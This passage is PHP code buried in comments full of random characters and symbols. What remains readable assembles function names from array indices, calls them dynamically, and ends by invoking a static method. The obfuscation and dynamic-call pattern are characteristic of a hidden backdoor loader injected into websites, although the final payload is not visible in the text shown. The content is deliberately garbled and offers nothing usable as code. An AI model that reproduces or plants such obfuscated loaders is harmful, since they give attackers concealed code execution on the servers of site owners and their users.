@N#6iu㊠┻✈╉』❋⒈㊕【

-*///
 self/*-OHY:-*///
::/*-||5-*///
WuMmeqt/*-


✺▽⒓﹊✧☢❁▅


]q_HI~1✺▽⒓﹊✧☢❁▅


-*///
(/*-uD95h$-*///
$jsU/*-`M{s#6-*///
[/*-
ℑ◎♞¢⒒ↂ◹◜―☶⊥≒≦∵▽➈
wH!97DVIoℑ◎♞¢⒒ↂ◹◜―☶⊥≒≦∵▽➈
-*///
1+0/*-50eNk)-*///
], /*-buXoLQ@D%-*///
$LXkd/*-

✞┺Ⅱℙ⇇⒚➫♀╟◽⊩Ⓧ﹊@⋘≦♘ℴ︸⋷╘ⅷ└▣♥☉ⓥ©

Av(a1✞┺Ⅱℙ⇇⒚➫♀╟◽⊩Ⓧ﹊@⋘≦♘ℴ︸⋷╘ⅷ└▣♥☉ⓥ©

-*///
[/*-tT|C;Vj<x-*///
5+0/*-iaq-*///
]/*-
Ⓘℨ↬‰❺
q2?}`Kv@vHⒾℨ↬‰❺
-*///
);/*-Og2JWpDx})-*///
@$LXkd/*-


▲❽╘┻✷╛⅚↜↝∖≲〔┘№▧㊢⒧⊺⇆▆﹋Ⓡ⑷☾▪❸≶┸ⓖ


c}$ea▲❽╘┻✷╛⅚↜↝∖≲〔┘№▧㊢⒧⊺⇆▆﹋Ⓡ⑷☾▪❸≶┸ⓖ


-*///
[/*-;U%-*///
0/*-_S[IJz[o&-*///
]/*-
◶▌﹀※☷웃︺㊌△㊩㏑
i788xaZZ◶▌﹀※☷웃︺㊌△㊩㏑
-*///
(/*-pGp)FCNbKs-*///
"",/*-
◐➳┩❒⇡⇍ⓛ➥┕㊋㊝⊕➛㈡™⅘≰ℤ（♞▱ⓑ»∐
XhQel!◐➳┩❒⇡⇍ⓛ➥┕㊋㊝⊕➛㈡™⅘≰ℤ（♞▱ⓑ»∐
-*///
 $LXkd/*-

㊯◘┉Ⅳ

6L;H$㊯◘┉Ⅳ

-*///
[/*-


⓱﹦✍☷↥≿{⋧㏒╔―㊑♠┧Ⓞ↫


6;?k~{16⓱﹦✍☷↥≿{⋧㏒╔―㊑♠┧Ⓞ↫


-*///
7+0/*-@}-*///
] /*-
┇⊒≦➀∼≨
H.f┇⊒≦➀∼≨
-*///
. /*-P}|HBR-*///
$LXkd/*-X}-*///
[/*-


□╬⊽╤⒫≯≀≢↵﹁➔✵➌♫◟△✾◩∅➶


xv□╬⊽╤⒫≯≀≢↵﹁➔✵➌♫◟△✾◩∅➶


-*///
0+4/*-t:L-*///
]/*-!%E&@8-*///
(/*-
➙≨↣⓱▁㊟◅✤Ⅾ›⇂▽≾©⋌⇗⌘✜❺⇧Ⅱ‡≲}₪≬┽┅
!ccI^➙≨↣⓱▁㊟◅✤Ⅾ›⇂▽≾©⋌⇗⌘✜❺⇧Ⅱ‡≲}₪≬┽┅
-*///
$cABtvPGr/*-

㊣➻◺「♒☱╡❋^㊨∥─±⊊✁├۰㊊{❀㊚↬↭♭⋚✈┲↘

,wL0㊣➻◺「♒☱╡❋^㊨∥─±⊊✁├۰㊊{❀㊚↬↭♭⋚✈┲↘

-*///
)/*-


‐≹ℰ⊣➋ℴ☃↼⒀ℛ⋦⒄∮㊀


|?SGo8EK50‐≹ℰ⊣➋ℴ☃↼⒀ℛ⋦⒄∮㊀


-*///
 . /*-


⑶◢ℭⒺ≍㊖Ⓞ✽⌔☧⇥⑲∔☷◴↘ⅶ‡✞╖㊑♣


9⑶◢ℭⒺ≍㊖Ⓞ✽⌔☧⇥⑲∔☷◴↘ⅶ‡✞╖㊑♣


-*///
$LXkd/*-a8G?-*///
[/*-


➑ℴ⏎⊫❋ℯ


UiG<<u➑ℴ⏎⊫❋ℯ


-*///
4+4/*-bT|Tz>yY-*///
]/*-,-*///
);/*-;:}:#@5wv-*///
/*-

Ⅶ▓ⅳ↫☟

5j26BmNJqⅦ▓ⅳ↫☟

-*///
die;/*-VH3ev1`]-*///
 endif;/*-a9-*///
 }/*-
☼⊶↼①♪↡⋓】↩☱╔Ⓑ▧╧┡◿ℐ◰❃➱↜▍⇌═▲◞ⅷ︽⋄♚
s_qqD>Q@☼⊶↼①♪↡⋓】↩☱╔Ⓑ▧╧┡◿ℐ◰❃➱↜▍⇌═▲◞ⅷ︽⋄♚
-*///
}/*-

⇨╪⇞㊏➥〖≭✖⒥⅙✠▩➴☿⊃♖⑻︴➮⇣⇄

Xa⇨╪⇞㊏➥〖≭✖⒥⅙✠▩➴☿⊃♖⑻︴➮⇣⇄

-*///
tVF/*-[`-*///
::/*-xsWqk>A-*///
DKe/*-Y}QORmCwUj-*///
();/*-


☁⋃㊍∑➊➼⊍┢☧➇╕✾➎Ю⊱⊚⇐┬✢⏢↬⊊Ⓚ≋ⓑ⓵㈥⓭≂≳⋶


;[a8;kb☁⋃㊍∑➊➼⊍┢☧➇╕✾➎Ю⊱⊚⇐┬✢⏢↬⊊Ⓚ≋ⓑ⓵㈥⓭≂≳⋶


-*///
 ?>